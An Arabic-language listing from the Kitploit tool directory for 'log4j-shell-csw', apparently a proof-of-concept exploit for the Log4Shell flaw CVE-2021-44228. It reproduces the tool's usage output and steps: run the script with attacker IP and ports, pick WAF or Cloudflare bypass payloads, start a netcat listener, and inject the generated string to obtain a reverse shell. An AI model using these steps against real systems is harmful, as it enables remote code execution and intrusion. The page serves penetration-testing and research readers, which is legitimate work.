Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-shell-csw — استغلال إثبات المفهوم لثغرة CVE-2021-44228. | Kitploit
أدوات/GitHubGitHub/cybersecurityworks553/log4j-shell-csw
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFالقيادة والسيطرة
GitHubcybersecurityworks553/log4j-shell-csw

log4j-shell-csw

استغلال إثبات المفهوم لثغرة CVE-2021-44228.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
82منذ 4 سنواتلم تتم المراجعة بعد

استغلال Log4j بسيط

استغلال لإثبات المفهوم لثغرة CVE-2021-44228.

Log4j، الذي يُستخدم لتسجيل معلومات الأمان والأداء، يؤثر على أكثر من 3 مليارات جهاز يستخدم Java عبر مجموعة متنوعة من الخدمات الاستهلاكية والمؤسسية والمواقع والتطبيقات، بالإضافة إلى الأجهزة الطبية والأنظمة الداعمة.
ملاحظة: هذا ليس استغلالًا من نوع "نقطة وانقر". سيتم توليد الحمولة الأولية للتفعيل، لكن حقنها في المكان المناسب (مثل ترويسة HTTP/الدردشة/إلخ) سيكون متروكًا للمستخدم.

المتطلبات الأساسية

  • python3
  • pip install -r requirements.txt
  • قم بتثبيت jdk1.8.0_20 وأضف مجلد bin إلى متغير البيئة
root@kitploit:~
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
مثال:
  1. قم بتشغيل السكربت لنظام Linux مع حمولة تجاوز من نوع methods
root@kitploit:~
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods

2) شغّل netcat على المنفذ 9001 في جهازك المحلي

root@kitploit:~
nc -lvnp 9001
  1. انسخ حمولة 'Try me' لتجاوز قيود methods واستخدمها كمتغير إدخال للحصول على شل في netcat
    ملاحظة: إذا لم يتم اختيار أي تجاوز، استخدم حمولة 'Send me'

المراجع

  • https://akashpatil.me/log4j-guide-book.html
  • https://github.com/kozmer/log4j-shell-poc
تنزيل الأداة